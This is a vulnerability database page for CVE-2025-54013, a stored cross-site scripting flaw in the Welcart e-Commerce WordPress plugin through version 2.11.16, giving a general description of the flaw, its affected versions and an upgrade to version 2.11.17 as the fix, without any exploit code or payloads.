CVE-2025-54013

2025-07-16 [email protected]
WordPress PHP XSS

Lifecycle Timeline

2
Analysis Generated
Apr 01, 2026 - 17:43 vuln.today
CVE Published
Jul 16, 2025 - 11:15 nvd
N/A

DescriptionNVD

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in info@welcart Welcart e-Commerce usc-e-shop allows Stored XSS.This issue affects Welcart e-Commerce: from n/a through <= 2.11.16.

AnalysisAI

Stored cross-site scripting (XSS) in Welcart e-Commerce WordPress plugin versions 2.11.16 and earlier allows authenticated users to inject malicious scripts that execute in the browsers of other site visitors, potentially compromising administrator accounts or customer data. The vulnerability exists in the web page generation process where user input is not properly sanitized before being stored and rendered to other users. No public exploit code or active exploitation has been confirmed, but the low EPSS score (0.04%) suggests limited real-world attack probability despite the XSS classification.

Technical ContextAI

Welcart e-Commerce is a WordPress e-commerce plugin (identified by CPE mapping to wordpress-plugin-usc-e-shop) that processes and displays user-supplied data during web page generation. The vulnerability stems from CWE-79 (Improper Neutralization of Input During Web Page Generation), a class of input validation failure where untrusted data reaches a web browser without proper escaping or encoding. The plugin fails to neutralize potentially malicious HTML and JavaScript characters in stored data, allowing an authenticated attacker to craft payloads that persist in the database and execute when rendered to other users viewing the same page or content.

Affected ProductsAI

Welcart e-Commerce plugin for WordPress (usc-e-shop) in versions 2.11.16 and all earlier releases are affected. This impacts any WordPress installation running the plugin below version 2.11.17 or later patched versions. Affected organizations can reference the vendor advisory at https://patchstack.com/database/Wordpress/Plugin/usc-e-shop/vulnerability/wordpress-welcart-e-commerce-plugin-2-11-16-cross-site-scripting-xss-vulnerability for detailed version information and deployment scope.

RemediationAI

Upgrade Welcart e-Commerce plugin to version 2.11.17 or later, which contains fixes for the stored XSS vulnerability. Users should visit the WordPress plugin repository or contact info@welcart directly to obtain the patched version. As an interim measure, site administrators should restrict plugin functionality permissions to only trusted administrators and monitor for suspicious content modifications in the database. Patchstack's advisory at the reference URL provides additional guidance on safe deployment and verification of the fix.

Share

CVE-2025-54013 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy